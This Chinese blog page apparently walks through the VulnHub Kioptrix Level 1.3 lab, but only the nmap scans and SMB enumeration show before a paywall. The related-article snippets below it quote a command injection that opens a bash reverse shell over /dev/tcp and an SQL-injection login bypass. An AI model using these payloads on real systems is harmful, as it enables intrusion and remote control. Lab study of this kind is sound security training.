KIOPTRIX: LEVEL 1.3-VulnHub靶机学习第五篇

已于 2022-09-14 20:17:54 修改
阅读量1.2k 收藏 1
点赞数
分类专栏: VnlnHub学习之旅 文章标签: kali 安全 web安全 系统安全 linux
于 2022-09-11 22:25:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_27466929/article/details/126808358
版权
本文详细记录了对Kioptrix Level 1.3靶机的渗透测试过程,从实验准备、情报收集到实际的渗透测试。在情报收集阶段,通过smb探测发现Samba版本及用户信息,80端口存在SQL注入漏洞。后续利用sqlmap尝试登陆和ssh远程访问,最终目标是通过Mysql提权。
摘要由CSDN通过智能技术生成

 写在前面:前人栽树后人乘凉,谢谢网上各位大佬的解题思路作为参考学习;

一、实验准备

        1、实验地址:Kioptrix: Level 1.3 (#4) ~ VulnHub

        2、下载之后,本地解压,用VMware运行该虚拟机;

        

        3、设置Kioptrix Level 1.3与攻击机网络环境,保证在同一局域网;  

                          

        4、本实验攻击机使用的是Kali Linux,IP地址:10.10.10.131

二、情报收集

┌──(root💀kali)-[~]
└─# nmap -sP 10.10.10.0/24         
Nmap scan report for 10.10.10.149 (10.10.10.149)
Host is up (0.00036s latency).
MAC Address: 00:0C:29:AE:CA:8A (VMware)
                                                                                                             
┌──(root💀kali)-[~]
└─# nmap -sV -p1-65535 10.10.10.149     

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 00:0C:29:AE:CA:8A (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

        1、smb探测

msf6 auxiliary(scanner/smb/smb_enumusers) > run

[+] 10.10.10.149:139
最低0.47元/天 解锁文章
迷の泰坦
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机系列:Kioptrix: Level 1.3 (#4)
汗的博客
04-02 807
这次的是Vulnhub靶机: 这次的靶机是Vulnhub靶机Kioptrix: Level 1.2 (#3) 靶机地址及相关描述 靶机地址:https://www.vulnhub.com/entry/kioptrix-level-13-4,25/ 靶机设置 这个靶机需要自己新建一个空的虚拟机 移除现在的硬盘,用靶机替换,开机。老规矩,用netdiscover和curl确定一下目标已经OK。 ...
Kioptrix: Level 1.3 (#4) (考点:脑洞/base64/上传/linux)
冬萍子癸水
04-20 383
如果是vmware。开始前要把靶机的mac地址设成08:00:27:A5:A6:76 然后靶机开机页面自动就显示ip地址了 nmap 就一个80,没啥说的,突破点就是网页搜集信息。不过这里都直接检测到linux的版本了。。又是2这么低的,一旦拿到shell。。。直接用脏牛啊。。脏牛用法参考这篇 C:\root\Desktop> nmap -A 192.168.189.186 Startin...
VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.3
LYJ20010728的博客
08-09 650
VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.3环境下载KIOPTRIX: LEVEL 1靶机搭建渗透测试信息搜集漏洞挖掘getshell提权补充 环境下载 戳此进行环境下载 KIOPTRIX: LEVEL 1靶机搭建 由于压缩包内只有一个虚拟硬盘,需要打开一个虚拟机加入这块硬盘 将原来的硬盘删去,选择下载好的靶机硬盘,并将网络适配器设置为NAT模式 打开靶机即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan
oscp——Kioptrix: Level 1.3 (#4)
王嘟嘟的博客
02-28 965
0x00 目标资料 36 链接 https://www.vulnhub.com/entry/kioptrix-level-13-4,25/ 难度推荐 4 思路 1 端口 0.5 web——usershell 1 usershell——rootshell 1.5 环境搭建 VMware 下载下来之后是一个vmdx的文件,所以要经过处理 这里新建一个虚拟机,选择其他 移除原来的硬盘 加载下...
Vulnhub-靶机-Kioptrix: Level 1.3 (#4)
qq_43264813的博客
02-02 450
Vulnhub—靶机Kioptrix: Level 1.3 (#4) 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ 文章目录Vulnhub—靶机Kioptrix: Level 1.3 (#4)一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址,对目标靶机进行全端口扫描: 【命令】n
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机是Vulnhub靶机Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Kioptrix_Level_1
12-30
Download from https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
vulnhub-KIOPTRIX: LEVEL 1.3 (#4)-KioptrixVM4靶场
shulao2010的博客
05-25 355
因为目标主机安装了mysql ,所以在翻文件的时候,发现了目标主机sql配置。尝试搜索系统信息,并没有找到系统是否使用市面上哪种系统,可能是自己开发的。加强密码策略,及时拿到shell,减少用户提权机会;利用sirsearch扫描目录时,发现一个sql文件,访问后。按照截图设置,下一步之后,会提示是否转换,选保持原样即可。对登录页面进行sql注入,发现密码输入框存在注入点。及时升级系统版本,并进行加固;提权成功,exit退出mysql,切换root。但是直接登录,登录失败,ssh也是登录失败。
Vulhub靶场 --- Kioptrix: Level 1.3 (#4)
m0_52072483的博客
01-28 220
Vulhub靶场 — Kioptrix: Level 1.3 (#4) 目录Vulhub靶场 --- Kioptrix: Level 1.3 (#4)1、信息搜集2、getshell3、提权 1、信息搜集 dirb nmap nmap -sV -O -p- 192.168.76.37 wapplayzer 2、getshell 已知为源码为PHP,测试万能密码 username:xxx password:1' or 1='1-- 在john目录有john.php文件,打开看看 此处有
vulnhub靶机渗透 Kioptrix1.3
RestoreJustice的博客
03-18 199
​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。192.168.110.135,为靶机ip,也可以使用Kali中的arp-scan工具扫描:arp-scan 192.168.110.1/24。使用nmap扫描端口,并做服务识别和深度扫描(加-A参数):nmap -p- -A 192.168.110.135。经测试登录处password参数存在SQL注入,并且爆出网站绝对路径:/var/www/
Vulnhub靶机Kioptrix_Level1.3
最新发布
qq_48904485的博客
03-17 395
运行环境:Virtualbox攻击机:kali(192.168.56.101)靶机Kioptrix_Level1.3(192.168.56.109)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-13-4,25安装虚拟机:由于下载下来的压缩包内只有一个虚拟硬盘,需要打开一个虚拟机加入这块硬盘选择自定义安装操作系统选择linux,版本随便选一个,其他默认即可。
KIOPTRIX: LEVEL 1.1-VulnHub靶机学习第三篇
qq_27466929的博客
08-25 818
VulnHub靶机学习第三篇:KIOPTRIX: LEVEL 1.1
Kioptrix: Level 1.1 (#2) -VulnHub靶机学习记录
weixin_45509443的博客
06-19 462
环境:靶机:192.168.1.107 kali:192.168.106 主机发现 端口扫描 浏览器登录80端口,发现登录页面,尝试sql注入绕过密码登录 成功进入,经典ping命令,存在命令执行 kali 开启监听,nc -lvp 6666, 靶机执行命令:127.0.0.1&bash -i >& /dev/tcp/192.168.1.106/6666 0>&1,反弹shell到kali攻击机 成功反弹但不是root权限,开始...
vulnhub靶机测试--Kioptrix 3
ximo的博客
03-25 309
目录前言信息收集主机发现端口扫描目录扫描漏洞利用提权总结 前言 这个系列基本上没有web方面的漏洞,都是系统、CMS版本漏洞;主要是了解一下提权方法。 信息收集 主机发现 端口扫描 目录扫描 漏洞利用 访问80端口: 第一个页面有个page参数,试了试文件包含,失败。 第二个页面有个system参数,命令执行漏洞?? 失败。 第三个页面是一个登录页面,同时知道了CMS。 再看看其他目录: 1.数据库登录后台 2.一个看不懂的(没加载,速度慢的网页): 3.目录遍历,但是啥用没有。 查找CMS
vulnhub靶机kioptrix3
weixin_53665747的博客
06-26 239
靶机整体还算简单,只是工具利用时候有几个点不知道为什么半天没成功,还有一点就是自己对信息处理还是不敏感,mysql账号密码发现的很慢还有ht这个点自己一直没利用好。
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值